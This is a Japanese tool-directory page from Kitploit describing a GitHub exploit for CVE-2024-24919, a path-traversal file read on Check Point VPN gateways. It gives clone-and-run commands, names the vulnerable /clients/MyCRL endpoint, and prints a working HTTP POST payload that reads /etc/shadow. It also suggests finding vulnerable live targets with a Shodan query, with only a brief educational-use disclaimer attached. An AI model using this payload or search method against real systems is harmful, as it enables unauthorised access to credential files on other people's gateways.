Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 エクスプロイトおよびPoC - リモートアクセスVPNまたはモバイルアクセス向けのクリティカルなLFI | Kitploit
ツール/GitHubGitHub/rug4lo/cve-2024-24919-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 エクスプロイトおよびPoC - リモートアクセスVPNまたはモバイルアクセス向けのクリティカルなLFI

リポジトリを見る
32年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-24919-エクスプロイト

概要

このリポジトリには、CVE-2024-24919 に対する Python エクスプロイトが含まれています。この脆弱性により、脆弱なページから機密ファイルを読み取ることができます。

このエクスプロイトは、まずターゲットが脆弱かどうかを確認し、次に指定されたパスを取得します。

重要度: クリティカル

使用方法

まずリポジトリをクローンします:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

権限を付与し、python3 でエクスプロイトを実行します

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

その後、手順に従うと、指定したファイルのデータを取得できます

問題がある場合は、指定する URL がメインのものであることを確認してください

✓ https://google.com

✘ https://google.com/search?client=firefox

POC (概念実証)

まず、ウェブサイトがリモートアクセス VPN またはモバイルアクセスソフトウェアが有効になっている Check Point Security Gateway であることを確認する必要があります。

このエクスプロイトでは、{ip}/clients/MyCRL エンドポイントを対象としています。

このエンドポイントは、POST リクエストを行い、CSHELL/ という文字列と、パス横断を使用して読み取りたいファイルのパスを追加すると脆弱になります。

リクエストは次のようになります:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

これはソースコードを調べて得たものです。

プロセスの詳細については、こちらの投稿を確認してください --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

テスト

この脆弱性をテストしたい場合は、Sodan を使用して脆弱なウェブサイトを見つけることができます。Sodan で以下のクエリを使用します

root@kitploit:~
Server: “Check Point SVN Foundation”

参考文献

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

免責事項

このスクリプトは教育目的のみで使用してください。責任を持って使用し、アクセス許可のあるシステムでのみ使用してください。

ツールをダウンロード